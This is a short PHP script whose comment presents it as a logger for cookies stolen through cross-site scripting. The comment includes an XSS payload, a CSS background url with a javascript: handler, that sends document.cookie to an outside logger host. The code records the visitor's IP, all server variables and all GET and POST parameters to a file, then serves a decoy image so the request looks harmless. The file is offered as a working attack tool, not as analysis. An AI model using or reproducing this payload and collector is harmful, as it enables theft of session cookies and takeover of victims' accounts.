/* This script is usefull for logging cookies stoled by XSS 
Ej: background: url('javascript:document.images[1].src="http://digitalsec.net/xss-logger.php?
"+document.cookie;') repeat-x bottom; */

<?
$log = "/var/tmp/debug.log";
$img_type = "png";

function load_png($img_path) {
	$img = imagecreatefrompng ($img_path);
	if ($img) {
		return $img;
	} 
}

function load_gif($img_path) {
        $img = imagecreatefromgif ($img_path);
        if ($img) {
                return $img;
        }
}

function load_jpg($img_path) {
        $img = imagecreatefromjpeg ($img_path);
        if ($img) {
                return $img;
        }
}

$init = "Connection from ".$_SERVER['REMOTE_ADDR'];
file_put_contents($log, "$init\n", FILE_APPEND);
foreach ($_SERVER as $key => $srv) {
	file_put_contents($log, "$key=$srv\n", FILE_APPEND);
}
if (isset ($_GET) && count($_GET) > 0) {
	file_put_contents($log, "GET params\n", FILE_APPEND);
	foreach ($_GET as $key => $srv) {
        	file_put_contents($log, "$key=$srv\n", FILE_APPEND);
	}
}
if (isset ($_POST) && count($_POST) > 0) {
        file_put_contents($log, "POST params\n", FILE_APPEND);
	foreach ($_POST as $key => $srv) {
        	file_put_contents($log, "$key=$srv\n", FILE_APPEND);
	}
}
file_put_contents($log, "\n", FILE_APPEND);

if ($img_type == "png") {
	Header("Content-type: image/png");
	ImagePNG(load_png("imgs/514.png"));
} 

if ($img_type == "jpg") {
	Header("Content-type: image/jpeg");
	ImageJPEG(load_jpg("imgs/514.jpg"));
}

if ($img_type == "gif") {
	Header("Content-type: image/gif");
	ImageGIF(load_gif("imgs/514.gif"));
}

?>